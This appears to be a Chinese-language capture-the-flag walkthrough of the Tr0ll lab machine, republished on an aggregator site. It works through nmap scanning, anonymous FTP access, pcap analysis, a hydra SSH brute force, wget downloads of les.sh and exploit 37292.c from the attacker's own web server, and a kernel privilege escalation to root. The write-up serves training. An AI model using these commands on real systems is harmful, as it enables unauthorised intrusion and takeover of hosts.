一、打靶總流程

1.確定目標：

????????在本靶場中，確定目標就是使用nmap進行ip掃描，確定ip即為目標，只是針對此靶場而言。其他實戰(zhàn)中確定目標的方式包括nmap進行掃描，但不局限于這個nmap。

2.信息收集：

????????比如平常挖洞使用fofa，天眼查，ip域名等進行查，在我們這個靶場中比如信息收集包括查看源碼，使用工具dirb等。

3.發(fā)現(xiàn)漏洞：

????????那些理論比如sql注入，文件上傳等，或者找到相關的系統(tǒng)信息，去網(wǎng)上找相關的exp這些都是為了拿到webshell。

4.漏洞利用：

????????漏洞利用就是使用漏洞拿到webshell。

5.權限提升：

????????權限提升，就是所謂的提權，因為一般進入拿到webshell后進入到服務器了都是低權限，在接下來的靶中我們的目標都是拿到root權限，所以拿到webshell后是低權限用戶，這個時候我們需要一系列的方式進行提權，最后拿到root權限，即為結束。

二、打靶實例詳解

文章內(nèi)的靶機及腳本關注后私信獲取

????????1.首先將靶機以及kali啟動。

?????????2.注意將兩者的網(wǎng)絡適配器均調(diào)整為NAT模式（確保二者是在同一個網(wǎng)段下）。

?????????3.從kali中打開終端，執(zhí)行ip a命令查看kali的ip地址。

????????4.使用nmap工具來確認要打的靶機的ip地址。?

nmap -sP 192.168.190.0/24

? ? ? ? 在上面掃描出的ip地址中，.1、.2、.254、.138都是kali自身的一些ip地址，所以在此確認要進行攻擊的靶機的ip地址為：192.168.190.139。

????????5.接下來繼續(xù)進行信息收集，信息收集的方面以及方式有很多，這里信息收集是針對此靶機的信息收集。

? ? ? ? 6.掃描靶機開放了哪些端口。

nmap -p- 192.168.190.139

? ? ? ? 可以看到此靶機開放了21、22、80端口。其中：開放了21端口ftp，可以想到可能存在弱口令；開放了22端口ssh，可以想到對其進行爆破，然后看到80端口web端，可以對其進行常見漏洞測試。?

? ? ? ? 7.對開放的各個端口的進行詳細查看。

nmap?-p- -sS -sV -A 192.168.190.139

? ? ? ? 8. 在各個端口的詳細信息中，可以看到21端口有個Anonymous登入成功過，因此可以嘗試進行弱口令登入，賬戶名和密碼都輸入為Anonymous進行嘗試。?

? ? ? ? 9.嘗試后發(fā)現(xiàn)確實存在弱口令問題，成功登錄了進去。

? ? ? ? ?10.登錄進去之后執(zhí)行l(wèi)s命令查看當前目錄下有哪些文件，來繼續(xù)進行信息收集。

? ? ? ? ?11.發(fā)現(xiàn)一個名為“l(fā)ol.pcap”的文件，我們將其下載到我們本地。

? ? ? ? 12.發(fā)現(xiàn)是一個流量數(shù)據(jù)，因此使用wireshark工具對其進行打開。

? ? ? ? 13.打開后可以看到下面的內(nèi)容。

????????14.我們隨便點擊一條流量數(shù)據(jù)，點擊TCP追蹤流，可以看到下面的信息，但是并沒有發(fā)現(xiàn)有用的信息。

? ? ? ? 15.?將其關閉后我們可以看到軟件上方的篩選信息，此時為0。

? ? ? ? 16.將其更改成1后再進行TCP流追蹤，可以看到一個txt文件。

????????17.此時想到最開始進行掃描的時候，靶機存在開放的80端口，因此想到對其進行搜索，發(fā)現(xiàn)搜索結果返回404，說明搜索的結果是沒用的。

? ? ? ?18.回到流量工具內(nèi)，將篩選框后面的1更改為2后繼續(xù)追蹤TCP流，根據(jù)其英文解釋，可以想到“sup3rs3cr3tdirlol”可能是一個文件的路徑，因此再次嘗試進行拼接。

?????????19.拼接后網(wǎng)頁返回了下面的內(nèi)容。

? ? ? ? 20.可以看到存在一個名為“roflmao”的文件，點擊后將其下載下來。

? ? ? ? ?21.來到下載路徑下后，使用file命令或者strings命令將文件打開。

? ? ? ? 22.可以看到還原出來的內(nèi)容里存在下面的一句話，因此我們嘗試將獲得的信息再次進行拼接后搜索。

? ? ? ? 23.再次進行拼接搜索后進入了下面的頁面。

? ? ? ? ?24.在這里點擊“good_luck”后進入了到了下面的頁面。

? ? ? ? 25.?在此頁面內(nèi)又發(fā)現(xiàn)了一個txt文件，點擊后可以看到下面的內(nèi)容，這里就相當于是一個用戶名的字典，找到了有用的用戶名。

? ? ? ? ?26.在桌面上創(chuàng)建一個名為user的文檔來存儲這些用戶名。

? ? ? ? 27.回到瀏覽器的前面的頁面，發(fā)現(xiàn)存在一個可能存在密碼的文件。

? ? ? ? ?28.進入后又發(fā)現(xiàn)了一個txt文件，打開后可以看到下面的內(nèi)容，因此可以想到密碼有可能是Good_job_:)也有可能是Pass.txt。

?????????29.將猜想的可能的密碼也放入一個txt文檔中當作密碼的字典。

? ? ? ? 30.?來到桌面路徑下使用hydra工具對其進行爆破，可以看到成功將用戶名和密碼爆破了出來。?

hydra -L user -P password 192.168.190.139 ssh

? ? ? ? 31.接下來就使用爆破出來的用戶名和密碼進行登錄，發(fā)現(xiàn)登錄成功了。?

ssh overflow@192.168.190.139

? ? ? ? 32.但是發(fā)現(xiàn)此時的權限是低權限：

• id為:0 root ? ?
• 0 < id < 1000 服務用戶： 為服務提供權限 ?
• 1000 <= id <=60000 普通

????????因此還要進行提權，下面是linux提權的幾種方式：

• 內(nèi)核提權---臟牛提權最為典型 ，內(nèi)核提權一般包括3個步驟，信息收集發(fā)現(xiàn)版本號，找到相關版本的exp，使用找到的exp對目標發(fā)起攻擊，完成提權功能。
• 利用suid提權?
• 利用sudo提權
• mfs提權
• mysql提權 包括udf mof提權方式

? ? ? ? 33.發(fā)現(xiàn)進入的是一個偽終端，因此還要將其轉換為真終端，執(zhí)行下面的命令就將其變成了真終端。

python -c 'import pty; pty.spawn("/bin/bash")'

? ? ? ? 34.接下來開始提權。

? ? ? ? 35.首先在本地開啟一個web服務。

python3 -m http.server 8083

? ? ? ? 35.?直接執(zhí)行下面的命令將腳本文件下載到靶機上，但是發(fā)現(xiàn)下載失敗了，因為此時權限不夠。

wget http://192.168.190.138:8083/les.sh

? ? ? ? 36.切換到tmp目錄下再次進行下載，發(fā)現(xiàn)下載成功了，因為其是一個臨時文件，所以在此目錄下的權限會高一些，因此就可以成功下載了。

? ? ? ?37.下載完之后將web服務關閉，在終端內(nèi)按CTRL+z。?

? ? ? 38.給其添加一個權限后進行執(zhí)行。

chmod +x les.sh

./les.sh

? ? ? ? 39.?這個腳本執(zhí)行后會檢測Linux內(nèi)核版本存在哪些漏洞，檢測出來的結果的顏色越深說明可以被利用的可能性越大。

? ? ? ? 40.接下來進行exp的利用就可以了。

? ? ? ? 41.下面演示第二種提權方式。

? ? ? ? 42.可以通過自己獲取到Linux的版本信息，然后在kali內(nèi)進行搜索。

uname -a

? ? ? ? 43.獲取到版本信息后執(zhí)行下面的命令在kali內(nèi)進行搜索。

searchsploit Linux 4-Tr0ll 3.13.0

? ? ? ? 44.在此標紅的兩條就是滿足條件的。

? ? ? ? 45.接下來的思路就是將本都的exp搞到靶機的服務器內(nèi)進行運行，就可以實現(xiàn)提權的效果。

? ? ? ? 46.獲取到exp的絕對路徑。

locate linux/local/37292.c

? ? ? ? 47.將其存放在桌面。

cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/桌面

? ? ? ? 48.將其打開后就可以看到exp的內(nèi)容。

? ? ? ? 49.?再從本地開啟web服務。

? ? ? ? 50.?將exp下載到靶機。

wget http://192.168.190.138:8085/37292.c

? ? ? ? 51.下載完之后將web服務關閉，在終端內(nèi)按CTRL+z。?

? ? ? ? 52.將其進行編譯和執(zhí)行，此時再次查看權限，可以看到此時的權限就是root權限了。

????????53.查看靶機內(nèi)的文件proof.txt,至此我們就成功拿下了靶機！??！

文章來源地址http://www.zghlxwxcb.cn/news/detail-575743.html

到了這里，關于一次零基礎靶機滲透細節(jié)全程記錄的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網(wǎng)！